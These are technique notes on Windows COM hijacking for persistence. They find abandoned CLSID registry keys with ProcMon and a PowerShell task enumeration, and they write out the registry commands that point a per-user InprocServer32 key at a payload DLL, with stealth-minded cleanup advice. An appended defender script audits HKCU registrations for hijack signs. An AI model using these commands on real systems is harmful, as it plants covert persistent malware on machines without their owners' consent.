Although it is possible to modify COM objects that are in use, doing so might break certain applications and cost stealth. A better way is to look for abandoned registry keys: keys that applications attempt to access but that don't actually exist in the registry hive.

Finding Abandoned Keys (ProcMon)

Process Monitor from Sysinternals Suite is useful for hunting potential COM hijacks. If it is not possible to run it on the target machine, run it on your own machine first (a similar Windows version is probably necessary, since the keys each application probes differ between builds).

Set the filter to:

  • Operation is RegOpenKey
  • and Result is NAME NOT FOUND
  • and Path ends with InprocServer32

Finding Abandoned Keys (Task Scheduler)

Another way to find abandoned keys is through task scheduler:

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
    # Only tasks whose action is a COM handler (ClassId set) are interesting here;
    # require an enabled trigger and the "Users" principal so the task actually
    # fires in a normal user's session.
    if (($Task.Actions.ClassId -ne $null)
        -and ($Task.Triggers.Enabled -eq $true)
        -and ($Task.Principal.GroupId -eq "Users"))
    {
        Write-Host "Task Name: " $Task.TaskName
        Write-Host "Task Path: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
    }
}

Say the CLSID is {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}. First check whether the task is reboot-persistent (in Task Scheduler or in PowerShell). Often the COM object is defined in HKCR: Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}". The same applies to HKLM. Where the hijacking comes in is HKCU: per-user entries under HKCU\Software\Classes are consulted before the machine-wide ones when HKCR is resolved, so a key that is absent there can be supplied by the current user.

Hijacking

Say the above steps turn up a suitable abandoned key, e.g. HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32 shows up in the ProcMon event list. We can use Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" to confirm that it doesn't exist.

To hijack the nonexistent key (after first uploading the DLL; pretend this is the target machine, not the attacker's):

PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"
PS C:\Users\Attacker> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Clean up after yourself

Remember to delete both the registry entries in HKCU and the associated DLL file.
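The defender's counterpart to the steps above, as an added example that is not part of the original notes: it lists every per-user InprocServer32 registration and flags the three signs of the hijack described here (an HKCU CLSID that shadows an HKLM one, a DLL outside protected directories, or a DLL path that no longer exists on disk). The function names and the constructed sample entry are my own.

```powershell
# Added example, not from the original notes: audit HKCU COM registrations.

function Get-UserComRegistrations {
    # Every per-user CLSID that carries an InprocServer32 subkey, with its DLL path.
    Get-ChildItem -Path 'HKCU:\Software\Classes\CLSID' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $inproc = Join-Path $_.PSPath 'InprocServer32'
            if (Test-Path -Path $inproc) {
                [pscustomobject]@{
                    Clsid = $_.PSChildName
                    Dll   = (Get-ItemProperty -Path $inproc).'(default)'
                }
            }
        }
}

function Get-MachineComClsids {
    # CLSIDs registered machine-wide; an HKCU twin of one of these shadows it.
    (Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID' -ErrorAction SilentlyContinue).PSChildName
}

function Test-ComHijackIndicators {
    # Pure check over collected entries, so it can also be run on constructed data.
    param(
        [pscustomobject[]] $Entries,
        [string[]] $MachineClsids = @(),
        [string[]] $TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\")
    )
    foreach ($e in $Entries) {
        $reasons = @()
        $dll = [Environment]::ExpandEnvironmentVariables([string]$e.Dll).Trim('"')
        if ($MachineClsids -contains $e.Clsid) { $reasons += 'shadows an HKLM registration' }
        $trusted = $TrustedRoots | Where-Object { $dll.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }
        if (-not $trusted) { $reasons += 'DLL outside protected directories' }
        if ([string]::IsNullOrWhiteSpace($dll)) { $reasons += 'no DLL path' }
        elseif (-not (Test-Path -LiteralPath $dll)) { $reasons += 'DLL missing on disk' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Clsid = $e.Clsid; Dll = $dll; Reasons = ($reasons -join '; ') }
        }
    }
}

# Live audit of the current user's hive:
Test-ComHijackIndicators -Entries (Get-UserComRegistrations) -MachineClsids (Get-MachineComClsids) |
    Format-Table -AutoSize

# Constructed sample entry mirroring the registry keys created in the notes above:
$sample = [pscustomobject]@{ Clsid = '{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}'; Dll = 'C:\Payloads\http_x64.dll' }
Test-ComHijackIndicators -Entries @($sample)
```

A hit is an indicator rather than proof: applications installed per-user (under %LOCALAPPDATA%, for instance) legitimately register their own CLSIDs in HKCU, so compare the flagged DLL's signer and install history before treating it as a hijack.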